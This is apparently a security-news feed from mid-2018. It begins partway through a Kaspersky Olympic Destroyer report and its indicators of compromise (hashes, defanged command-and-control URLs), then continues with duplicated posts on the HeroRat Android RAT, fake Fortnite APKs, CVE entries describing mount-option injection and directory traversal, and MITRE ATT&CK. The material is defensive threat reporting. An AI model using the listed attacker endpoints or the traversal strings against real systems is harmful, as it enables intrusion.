Certain conclusions could be made based on motives and the selection of targets in this campaign. However, it is easy to make a mistake when trying to answer the question of who is behind this campaign with only the fragments of the picture that are visible to researchers. The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever. We believe that it is no longer possible to draw conclusions based on few attribution vectors discovered during regular investigation. The resistance to and deterrence of threats such as Olympic Destroyer should be based on cooperation between the private sector and governments across national borders. Unfortunately, the current geopolitical situation in the world only boosts the global segmentation of the internet and introduces many obstacles for researchers and investigators. This will encourage APT attackers to continue marching into the protected networks of foreign governments and commercial companies.

The best thing we can do as researchers is to keep tracking threats like this. We will keep monitoring Olympic Destroyer and report on new discovered activities of this group.

More details about Olympic Destroyer and related activity are available to subscribers of Kaspersky Intelligence Reporting services. Contact: intelreports@kaspersky.com

Indicators Of Compromise

File Hashes

9bc365a16c63f25dfddcbe11da042974 Korporativ .doc
da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
6ccd8133f250d4babefbd66b898739b9 corporativ_2018.doc
abe771f280cdea6e7eaf19a26b1a9488 Scan-2018-03-13.doc.bin
b60da65b8d3627a89481efb23d59713a Corporativ_2018.doc
b94bdb63f0703d32c20f4b2e5500dbbe
bb5e8733a940fedfb1ef6b0e0ec3635c recommandation.doc
97ddc336d7d92b7db17d098ec2ee6092 recommandation.doc
1d0cf431e623b21aeae8f2b8414d2a73 Investigation_file.doc
0e7b32d23fbd6d62a593c234bafa2311 Spiez CONVERGENCE.doc
e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc
0c6ddc3a722b865cc2d1185e27cef9b8
54b06b05b6b92a8f2ff02fdf47baad0e
4247901eca6d87f5f3af7df8249ea825 nakaz.doc

Domains and IPs

79.142.76[.]40:80/news.php
79.142.76[.]40:8989/login/process.php
79.142.76[.]40:8989/admin/get.php
159.148.186[.]116:80/admin/get.php
159.148.186[.]116:80/login/process.php
159.148.186[.]116:80/news.php
ppgca.ufob.edu[.]br/components/com_finder/helpers/access.log
ppgca.ufob.edu[.]br/components/com_finder/views/default.php
narpaninew.linuxuatwebspiders[.]com/components/com_j2xml/error.log
narpaninew.linuxuatwebspiders[.]com/components/com_contact/controllers/main.php
mysent[.]org/access.log.txt
mysent[.]org/modules/admin.php
5.133.12[.]224:333/admin/get.php

Shots Fired Again Between CPU Vendors AMD and Intel

Highdude702 shares a report from Tom's Hardware: AMD's feud with Intel took an interesting turn today as the company announced that it would swap 40 Core i7-8086K's won from Intel's sweepstakes with a much beefier Threadripper 1950X CPU. At Computex 2018, Intel officially announced it was releasing the Core i7-8086K, a special edition processor that commemorates the 40th anniversary of the 8086, which debuted as the first x86 processor on June 8, 1978. Now AMD is offering to replace 40 of the winners' chips with its own 16-core 32-thread $799 Threadripper processors, thus throwing a marketing wrench into Intel's 40th-anniversary celebration. AMD has a list of the complete terms and conditions on its site. But it is also noteworthy that "winners" of AMD's competing sweepstakes will have to pony up for a much more expensive X399 motherboard with the TR4 socket, which currently retail for more than $300, instead of Intel's less-expensive 300-series motherboards. Regardless, those who do swap their Intel Core silicon for an AMD Threadripper chip will gain 10 cores and quad-channel memory, not to mention quite a bit of resale value. In response, Slashdot reader Highdude702 said: "AMD is shooting back at Intel like its easy for them, even though 40 out of 8086 is kind of stingy. They are acting like they have the horsepower now. I believe it is going to be an interesting time for consumers and enthusiasts coming soon. Maybe we will even get better prices." Intel responded via its official verified "Intel Gaming" Twitter account, tweeting: ".@AMDRyzen, if you wanted an Intel Core i7-8086K processor too, you could have just asked us. :) Thanks for helping us celebrate the 8086!"

Read more of this story at Slashdot.

Surviving new cybercriminal fraud tactics takes greater stealth and sophistication

2017 was bad enough in the world of fraud, with identity theft reaching “epidemic levels”. But 2018 is panning out to be a whole lot worse: identify theft rates have

The post Surviving new cybercriminal fraud tactics takes greater stealth and sophistication appeared first on The Cyber Security Place.

How cloud technology is transforming the healthcare industry

All over the world, many governments face countless issues in their quest for a digitised health service. The healthcare system, as a whole, faces unprecedented challenges, thanks to a reduction

The post How cloud technology is transforming the healthcare industry appeared first on The Cyber Security Place.

Batten Down the Hatches against Crypto-Mining Pirates

Cryptocurrency mining relies on the computational power of the system used to create the currency and process the transactions. Many are realizing that the computational power, which requires a huge

The post Batten Down the Hatches against Crypto-Mining Pirates appeared first on The Cyber Security Place.

TRON Cryptocurrency Founder Buys BitTorrent, µTorrent for $140 Million

BitTorrent, the company which owns the popular file-sharing client uTorrent, has quietly been sold for $140 million in cash to Justin Sun, the founder of blockchain-focused startup TRON. TRON is a decentralized entertainment and content-sharing platform that uses blockchain and distributed storage technology. It allows users to publish content without having to use third-party platforms such

HeroRAT – A totally new Telegram-based Android RAT is spreading in the wild

Malware researchers from ESET have discovered a new strain of Android RAT, tracked as HeroRat, that leverages Telegram protocol for command and control, and data exfiltration.

HeroRat isn’t the first malware abusing Telegram protocol, past investigation reported similar threats like TeleRAT and IRRAT.

The new RAT has been in the wild at least since August 2017 and in March 2018 its source code was released for free on Telegram hacking channels allowing various threat actors to create their own variant.

HeroRat is born in this way, but it appears quite different from other variants that borrowed the source code. HeroRat is the first Telegram-based malware developed from scratch in C# using the Xamarin framework, previous ones were written in Java.

The RAT leverages Telesharp library for creating Telegram bots with C#.

“One of these variants is different from the rest – despite the freely available source code, it is offered for sale on a dedicated Telegram channel, marketed under the name HeroRat.” reads the analysis published by ESET. 

“It is available in three pricing models according to functionality, and comes with a support video channel. It is unclear whether this variant was created from the leaked source code, or if it is the “original” whose source code was leaked.”

The malware is spread through different channels, it is spread third-party app stores through disguised as social media and messaging apps.

Researchers observed the largest number of infection in Iran where malicious apps are offered promising free bitcoins, free internet connections, and additional followers on social media.

herorat telegram

The apps analyzed by ESET shows a strange behavior, after the malware is installed and launched on the victim’s device, it displays a small popup claiming the application can’t run on the device and for this reason, it will be uninstalled.

Once the uninstallation is seemingly completed, the icon associated with the app disappears, unfortunately, the attacker has already obtained the control of the victim’s device.

The attacker leverages the Telegram bot functionality to control the infected device, the malware is able to execute a broad range of commands such as data exfiltration and audio/video recording.

“The malware has a wide array of spying and file exfiltration capabilities, including intercepting text messages and contacts, sending text messages and making calls, audio and screen recording, obtaining device location, and controlling the device’s settings.“continues the analysis.

The source code of the HeroRat is offered for sale for 650 USD, the authors offer three packages of the malware depending on the features implemented., bronze, silver, and gold that go for 25, 50, and 100 USD, respectively.

The malware’s capabilities are accessible in the form of clickable buttons in the Telegram bot interface. Attackers can control victimized devices by simply tapping the buttons available in the version of the malware they are operating.

herorat telegram 3

The availability of the source code online will push new versions, the best way to check if your mobile has been infected is to scan it using a reliable mobile security solution.

Pierluigi Paganini

(Security Affairs – HeroRat, Telegram)

The post HeroRAT – A totally new Telegram-based Android RAT is spreading in the wild appeared first on Security Affairs.

Security Affairs: HeroRAT – A totally new Telegram-based Android RAT is spreading in the wild

Malware researchers from ESET have discovered a new strain of Android RAT, tracked as HeroRat, that leverages Telegram protocol for command and control, and data exfiltration.

HeroRat isn’t the first malware abusing Telegram protocol, past investigation reported similar threats like TeleRAT and IRRAT.

The new RAT has been in the wild at least since August 2017 and in March 2018 its source code was released for free on Telegram hacking channels allowing various threat actors to create their own variant.

HeroRat is born in this way, but it appears quite different from other variants that borrowed the source code. HeroRat is the first Telegram-based malware developed from scratch in C# using the Xamarin framework, previous ones were written in Java.

The RAT leverages Telesharp library for creating Telegram bots with C#.

“One of these variants is different from the rest – despite the freely available source code, it is offered for sale on a dedicated Telegram channel, marketed under the name HeroRat.” reads the analysis published by ESET. 

“It is available in three pricing models according to functionality, and comes with a support video channel. It is unclear whether this variant was created from the leaked source code, or if it is the “original” whose source code was leaked.”

The malware is spread through different channels, it is spread third-party app stores through disguised as social media and messaging apps.

Researchers observed the largest number of infection in Iran where malicious apps are offered promising free bitcoins, free internet connections, and additional followers on social media.

herorat telegram

The apps analyzed by ESET shows a strange behavior, after the malware is installed and launched on the victim’s device, it displays a small popup claiming the application can’t run on the device and for this reason, it will be uninstalled.

Once the uninstallation is seemingly completed, the icon associated with the app disappears, unfortunately, the attacker has already obtained the control of the victim’s device.

The attacker leverages the Telegram bot functionality to control the infected device, the malware is able to execute a broad range of commands such as data exfiltration and audio/video recording.

“The malware has a wide array of spying and file exfiltration capabilities, including intercepting text messages and contacts, sending text messages and making calls, audio and screen recording, obtaining device location, and controlling the device’s settings.“continues the analysis.

The source code of the HeroRat is offered for sale for 650 USD, the authors offer three packages of the malware depending on the features implemented., bronze, silver, and gold that go for 25, 50, and 100 USD, respectively.

The malware’s capabilities are accessible in the form of clickable buttons in the Telegram bot interface. Attackers can control victimized devices by simply tapping the buttons available in the version of the malware they are operating.

herorat telegram 3

The availability of the source code online will push new versions, the best way to check if your mobile has been infected is to scan it using a reliable mobile security solution.

Pierluigi Paganini

(Security Affairs – HeroRat, Telegram)

The post HeroRAT – A totally new Telegram-based Android RAT is spreading in the wild appeared first on Security Affairs.



Security Affairs

Ex-CIA employee charged with leaking ‘Vault 7’ hacking tools to Wikileaks

A 29-year-old former CIA computer programmer who was charged with possession of child pornography last year has now been charged with masterminding the largest leak of classified information in the agency's history. Joshua Adam Schulte, who once created malware for both the CIA and NSA to break into adversaries computers, was indicted Monday by the Department of Justice on 13 charges of

Kickstarter Bets On ‘Wired’ Arduino-Compatible IoT Platform

L-One-L-One writes: Most IoT home projects today are based on Wi-Fi, Bluetooth, Zigbee, and friends. But this is not always the ideal solution: you end up swapping batteries frequently, which becomes annoying quite quickly. You also have to deal with signal strength issues and interferences. To address this problem, a new Kickstarter campaign called NoCAN is proposing an Arduino-compatible internet-of-things platform based on wired connections that combine networking and power in one cable. The platform uses a set of cheap Arduino-compatible nodes controlled through a Raspberry Pi. The network uses CAN-bus and offers a publish/subscribe mechanism like MQTT and over-the-network firmware updates. It can also be controlled by a smartphone or tablet. Even with such features, can it succeed in going against the all-wireless trend? We'll know in a few weeks.

Read more of this story at Slashdot.

CVE-2018-12561

An issue was discovered in the cantata-mounter D-Bus service in Cantata through 2.3.1. A regular user can inject additional mount options such as file_mode= by manipulating (for example) the domain parameter of the samba URL.

CVE-2018-12560

An issue was discovered in the cantata-mounter D-Bus service in Cantata through 2.3.1. Arbitrary unmounts can be performed by regular users via directory traversal sequences such as a home/../sys/kernel substring.

CVE-2018-12563

An issue was discovered in Linaro LAVA before 2018.5.post1. Because of support for file: URLs, a user can force lava-server-gunicorn to download any file from the filesystem if it's readable by lavaserver and valid yaml.

CVE-2018-12562

An issue was discovered in the cantata-mounter D-Bus service in Cantata through 2.3.1. The wrapper script 'mount.cifs.wrapper' uses the shell to forward the arguments to the actual mount.cifs binary. The shell evaluates wildcards (such as in an injected string:/home/../tmp/* string).

CVE-2018-12564

An issue was discovered in Linaro LAVA before 2018.5.post1. Because of support for URLs in the submit page, a user can forge an HTTP request that will force lava-server-gunicorn to return any file on the server that is readable by lavaserver and valid yaml.

CVE-2018-12559

An issue was discovered in the cantata-mounter D-Bus service in Cantata through 2.3.1. The mount target path check in mounter.cpp `mpOk()` is insufficient. A regular user can consequently mount a CIFS filesystem anywhere (e.g., outside of the /home directory tree) by passing directory traversal sequences such as a home/../usr substring.

CVE-2018-12557

An issue was discovered in Zuul 3.x before 3.1.0. If nodes become offline during the build, the no_log attribute of a task is ignored. If the unreachable error occurred in a task used with a loop variable (e.g., with_items), the contents of the loop items would be printed in the console. This could lead to accidentally leaking credentials or secrets.

Security Affairs: Don’t install Fortnite Android APK because it could infect your mobile device

Fortnite is currently the most popular game, crooks are attempting to exploit the interest in forthcoming Fortnite Android to infect millions of fans.

No doubt, Fortnite is currently the most popular game, it is a co-op sandbox survival game developed by Epic Games and People Can Fly.

The game was released as a paid-for early access title for Microsoft Windows, macOS, PlayStation 4 and Xbox One on July 25, 2017, with a full free-to-play releases in 2018.

The Fortnite game has now more than 125 million active users.

The great success obtained by the Fortnite attracted cyber criminals that are attempting to exploit its popularity to target the fans.

Unfortunately for Android users, Fortnite for Android devices is not available yet, it is currently under development while the iOS version was released in March by Epic Games.

Fortnite Android 2

The company announced that the Battle Royale game is planned to be released for Android devices this summer.

In the recent weeks, crooks attempted to take advantage of Android users’ interest in an alleged version for their devices of the popular game.

Surfing online it is quite easy to find blog posts and video tutorial with instructions to install fake Fortnite Android App.

I spent an entire week to explain to my son and his friends the risks of installing APK from untrusted sources, believe me … it was the unique real battle royal of this story 🙂

Just searching for ‘Fortnite Android App’ on YouTube you will get an impressive number of videos on “How to install Fortnite on Android,” many of these videos were viewed millions of times also include links to actual Fortnite APK files.

Fortnite Android

A growing number of users is searching for Fortnite Android as reported by Google Trends:

&

Scammers are exploiting this interest to trick Android fans into downloading tainted version of the game that can compromise Android devices.

Some video tutorials appeared online recommend Android users to “install a few other apps” to unlock the Android Fortnite game. These apps could hide any kind of code, from cryptocurrency miners to apps used to generate revenue for their developers.

An impressive number of links purport to be official Fortnite app downloads, are used by crooks to deliver malicious applications.

If you are a fan of the Fornite game you have to wait until next summer for the official Android version, meantime don’t install alleged beta versions of the popular game from third-party stores.

Even if you see the Fortnite Android version in the official Google Play store, do not download it, unfortunately, scammers are able to deploy fake apps also on the official store.

Pierluigi Paganini

(Security Affairs – Fortnite Android, malware)

The post Don’t install Fortnite Android APK because it could infect your mobile device appeared first on Security Affairs.



Security Affairs

Don’t install Fortnite Android APK because it could infect your mobile device

Fortnite is currently the most popular game, crooks are attempting to exploit the interest in forthcoming Fortnite Android to infect millions of fans.

No doubt, Fortnite is currently the most popular game, it is a co-op sandbox survival game developed by Epic Games and People Can Fly.

The game was released as a paid-for early access title for Microsoft Windows, macOS, PlayStation 4 and Xbox One on July 25, 2017, with a full free-to-play releases in 2018.

The Fortnite game has now more than 125 million active users.

The great success obtained by the Fortnite attracted cyber criminals that are attempting to exploit its popularity to target the fans.

Unfortunately for Android users, Fortnite for Android devices is not available yet, it is currently under development while the iOS version was released in March by Epic Games.

Fortnite Android 2

The company announced that the Battle Royale game is planned to be released for Android devices this summer.

In the recent weeks, crooks attempted to take advantage of Android users’ interest in an alleged version for their devices of the popular game.

Surfing online it is quite easy to find blog posts and video tutorial with instructions to install fake Fortnite Android App.

I spent an entire week to explain to my son and his friends the risks of installing APK from untrusted sources, believe me … it was the unique real battle royal of this story 🙂

Just searching for ‘Fortnite Android App’ on YouTube you will get an impressive number of videos on “How to install Fortnite on Android,” many of these videos were viewed millions of times also include links to actual Fortnite APK files.

Fortnite Android

A growing number of users is searching for Fortnite Android as reported by Google Trends:

Scammers are exploiting this interest to trick Android fans into downloading tainted version of the game that can compromise Android devices.

Some video tutorials appeared online recommend Android users to “install a few other apps” to unlock the Android Fortnite game. These apps could hide any kind of code, from cryptocurrency miners to apps used to generate revenue for their developers.

An impressive number of links purport to be official Fortnite app downloads, are used by crooks to deliver malicious applications.

If you are a fan of the Fornite game you have to wait until next summer for the official Android version, meantime don’t install alleged beta versions of the popular game from third-party stores.

Even if you see the Fortnite Android version in the official Google Play store, do not download it, unfortunately, scammers are able to deploy fake apps also on the official store.

Pierluigi Paganini

(Security Affairs – Fortnite Android, malware)

The post Don’t install Fortnite Android APK because it could infect your mobile device appeared first on Security Affairs.

RedHat: RHSA-2018-1932:01 Moderate: zsh security update

LinuxSecurity.com: An update for zsh is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from

Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses

Every week we read about adversaries attacking their targets as part of online criminal campaigns. Information gathering, strategic advantage, and theft of intellectual property are some of the motivations. Besides these, we have seen during the past two years an increase in attacks in which adversaries are not shy of leaving a trail of destruction. One might wonder how to deal with these kinds of threats and where to start.

Sun Tzu’s The Art of War contains some great wisdom regarding the strategy of warfare. One of the most popular is the advice “If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Applying this advice to information security, let’s focus first on knowing yourself. Knowing yourself can roughly be divided into two parts:

  • What do I have that can be of value to an attacker?
  • How do I detect, protect, and correct any threats to my identified value?

Every company has a value, it takes only one criminal mind to see that and to attempt to exploit it. Ask yourself what the core of your business is, the secret sauce that people might be after, what will take you out of business, whom you are doing business with, who are your clients, etc.

Once you have identified your organization’s value, the second part of knowing yourself comes into play. You must understand where you to focus your defenses and invest in technology to detect and protect against threats.

After wrapping up the knowing yourself part, what can we learn from the enemy? Ask yourself “Who would likely be interested in attacking me?” By going through the list of known adversaries and cybercriminal groups, you can create a list based on which geographies and vectors they target and classify them by risk. Here is a simplified example:

Once you have your list and risk classification ready, you must next study the tactics, techniques, and procedures used by these adversaries. For mapping their techniques and associated campaigns, we use the MITRE Adversarial Tactics, Techniques, and Common Knowledge model (ATT&CK). The matrix covers hundreds of techniques, and can be applied for different purposes. In this case, we will focus on the risk versus mapping the defensive architecture.

In Q1 of 2018, we mapped the targeted attacks discovered by ourselves and our peers in the industry. The following example comes from one adversary we tracked, showing the techniques they used:

With MITRE’s Navigator tool you can select an actor or malware family. After making the selection, the boxes in the matrix show which techniques the actor or malware has used.

From these techniques we can learn how our environments protect against these techniques and where we have gaps. The goal is not to create coverage or signatures for each technique; the matrix helps organizations understand how attackers behave. Having more visibility into their methods leads us to the right responses, and helps us contain and eradicate attacks in a coordinated way. By comparing the multiple actors from your initial risk assessment, you can build the matrix from the perspective of high/medium/low risk and map it against your defenses.

Although some adversaries might not have a history of attacking you and your sector, it is still good to ask yourself “What if we were a target?” Would your environment create enough visibility to detect and deal with these techniques?

Statistics

When we looked at the first quarter, we noticed that the three techniques were the most popular in the category of Privilege Escalation:

  • Exploitation of vulnerability
  • Process injection
  • Valid accounts

To determine your coverage and detection capacity, you should ask if the exploits used completely new vulnerabilities (no patches available) or if they had existed for a while. Would your environment have the right patches installed or are you missing them and have to take action?

When we looked at the categories of Exfiltration and Command and Control, most campaigns exfiltrated their data over a control server channel using a common port. That translates to either TCP port 80 (HTTP) or TCP port 443 (HTTPS). We all use these ports from inside the network to communicate to the internet. What if all my other defenses would fail to discover the suspicious activity? Which defensive components in my network would be able to inspect the outgoing traffic and block or flag the exfiltration attempts?

Conclusion

In this post, we highlighted one approach and application of the ATT&CK model. There are many ways to apply it for red teaming, threat hunting, and other tasks. At McAfee we embrace the model and are applying it to different levels and purposes in our organization. We are not only using it but also contribute to the model by describing newly discovered techniques used by adversaries.

The post Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses appeared first on McAfee Blogs.

McAfee Blogs: Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses

Every week we read about adversaries attacking their targets as part of online criminal campaigns. Information gathering, strategic advantage, and theft of intellectual property are some of the motivations. Besides these, we have seen during the past two years an increase in attacks in which adversaries are not shy of leaving a trail of destruction. One might wonder how to deal with these kinds of threats and where to start.

Sun Tzu’s The Art of War contains some great wisdom regarding the strategy of warfare. One of the most popular is the advice “If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Applying this advice to information security, let’s focus first on knowing yourself. Knowing yourself can roughly be divided into two parts:

  • What do I have that can be of value to an attacker?
  • How do I detect, protect, and correct any threats to my identified value?

Every company has a value, it takes only one criminal mind to see that and to attempt to exploit it. Ask yourself what the core of your business is, the secret sauce that people might be after, what will take you out of business, whom you are doing business with, who are your clients, etc.

Once you have identified your organization’s value, the second part of knowing yourself comes into play. You must understand where you to focus your defenses and invest in technology to detect and protect against threats.

After wrapping up the knowing yourself part, what can we learn from the enemy? Ask yourself “Who would likely be interested in attacking me?” By going through the list of known adversaries and cybercriminal groups, you can create a list based on which geographies and vectors they target and classify them by risk. Here is a simplified example:

Once you have your list and risk classification ready, you must next study the tactics, techniques, and procedures used by these adversaries. For mapping their techniques and associated campaigns, we use the MITRE Adversarial Tactics, Techniques, and Common Knowledge model (ATT&CK). The matrix covers hundreds of techniques, and can be applied for different purposes. In this case, we will focus on the risk versus mapping the defensive architecture.

In Q1 of 2018, we mapped the targeted attacks discovered by ourselves and our peers in the industry. The following example comes from one adversary we tracked, showing the techniques they used:

With MITRE’s Navigator tool you can select an actor or malware family. After making the selection, the boxes in the matrix show which techniques the actor or malware has used.

From these techniques we can learn how our environments protect against these techniques and where we have gaps. The goal is not to create coverage or signatures for each technique; the matrix helps organizations understand how attackers behave. Having more visibility into their methods leads us to the right responses, and helps us contain and eradicate attacks in a coordinated way. By comparing the multiple actors from your initial risk assessment, you can build the matrix from the perspective of high/medium/low risk and map it against your defenses.

Although some adversaries might not have a history of attacking you and your sector, it is still good to ask yourself “What if we were a target?” Would your environment create enough visibility to detect and deal with these techniques?

Statistics

When we looked at the first quarter, we noticed that the three techniques were the most popular in the category of Privilege Escalation:

  • Exploitation of vulnerability
  • Process injection
  • Valid accounts

To determine your coverage and detection capacity, you should ask if the exploits used completely new vulnerabilities (no patches available) or if they had existed for a while. Would your environment have the right patches installed or are you missing them and have to take action?

When we looked at the categories of Exfiltration and Command and Control, most campaigns exfiltrated their data over a control server channel using a common port. That translates to either TCP port 80 (HTTP) or TCP port 443 (HTTPS). We all use these ports from inside the network to communicate to the internet. What if all my other defenses would fail to discover the suspicious activity? Which defensive components in my network would be able to inspect the outgoing traffic and block or flag the exfiltration attempts?

Conclusion

In this post, we highlighted one approach and application of the ATT&CK model. There are many ways to apply it for red teaming, threat hunting, and other tasks. At McAfee we embrace the model and are applying it to different levels and purposes in our organization. We are not only using it but also contribute to the model by describing newly discovered techniques used by adversaries.

The post Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses appeared first on McAfee Blogs.



McAfee Blogs